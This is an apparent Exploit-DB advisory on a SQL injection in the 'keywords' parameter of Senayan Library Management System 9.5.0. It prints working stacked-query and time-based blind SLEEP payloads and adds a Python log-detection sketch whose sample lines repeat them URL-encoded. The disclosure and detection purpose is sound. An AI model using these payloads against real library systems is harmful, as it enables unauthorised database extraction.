

[webapps] Senayan Library Management System v9.5.0 - SQL Injection
source link: https://www.exploit-db.com/exploits/51120

## Title: Senayan Library Management System v9.5.0 - SQL Injection
## Author: nu11secur1ty
## Date: 11.03.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0
## Description:
The `keywords` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the `keywords` parameter, and a general
error message was returned.
Two single quotes were then submitted and the error message
disappeared. The injection was confirmed manually by nu11secur1ty.
An attacker can use this vulnerability to retrieve all information
from the database of this system.
## STATUS: HIGH Vulnerability
[+] Payload:
```MySQL
---
Parameter: keywords (GET)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)
Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7'''))) RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#
---
```
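Both payload types above leave the same traces in a web server access log: a `SLEEP(` call, a stacked `;SELECT` or an `RLIKE (SELECT` subquery, and a trailing `#` comment inside the `keywords` GET parameter. The following detection sketch is an added example, not part of the original advisory or of SLiMS; the log lines, the `/placeholder` path, the `-- ` comment marker and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers drawn from the two payload types in the advisory.
MARKERS = {
    "time_delay": re.compile(r"\bsleep\s*\(", re.I),
    "stacked_query": re.compile(r";\s*select\b", re.I),
    "rlike_subquery": re.compile(r"\brlike\s*\(\s*select\b", re.I),
    "trailing_comment": re.compile(r"(?:#|--\s)\s*$"),
}
REQUEST = re.compile(r'"GET (\S+) HTTP/[\d.]+"')

def keywords_findings(log_line):
    """Return the sorted marker names found in the decoded `keywords` value."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    hits = set()
    # parse_qs percent-decodes values, so encoded payloads are matched too.
    for value in parse_qs(query, keep_blank_values=True).get("keywords", []):
        hits.update(name for name, rx in MARKERS.items() if rx.search(value))
    return sorted(hits)

def is_suspicious(log_line):
    """Require two markers: a lone '#' or the word 'sleep' is normal search text."""
    return len(keywords_findings(log_line)) >= 2

# Constructed sample lines (documentation IP, placeholder path).
PREFIX = ('203.0.113.9 - - [01/Jan/2024:10:00:00 +0000] '
          '"GET /placeholder?search=search&keywords=')
SUFFIX = ' HTTP/1.1" 200 812'
SAMPLE_LOG = [
    PREFIX + "the+big+sleep" + SUFFIX,   # benign title search
    PREFIX + "learning+c%23" + SUFFIX,   # benign, ends in '#'
    PREFIX + "abc%27%27%27%29%29%29%3BSELECT%20SLEEP%285%29%23" + SUFFIX,
    PREFIX + "abc%27%27%27%29%29%29%20RLIKE%20%28SELECT%209971%20FROM%20"
             "%28SELECT%28SLEEP%285%29%29%29bdiv%29%23" + SUFFIX,
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(is_suspicious(line), keywords_findings(line))
```

Pattern matching of this kind only surfaces probing after the fact; the fix for the flaw itself is to bind `keywords` as a query parameter in the application.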
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0)
## Proof and Exploit:
[href](https://streamable.com/63og5v)
## Time spent
`3:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>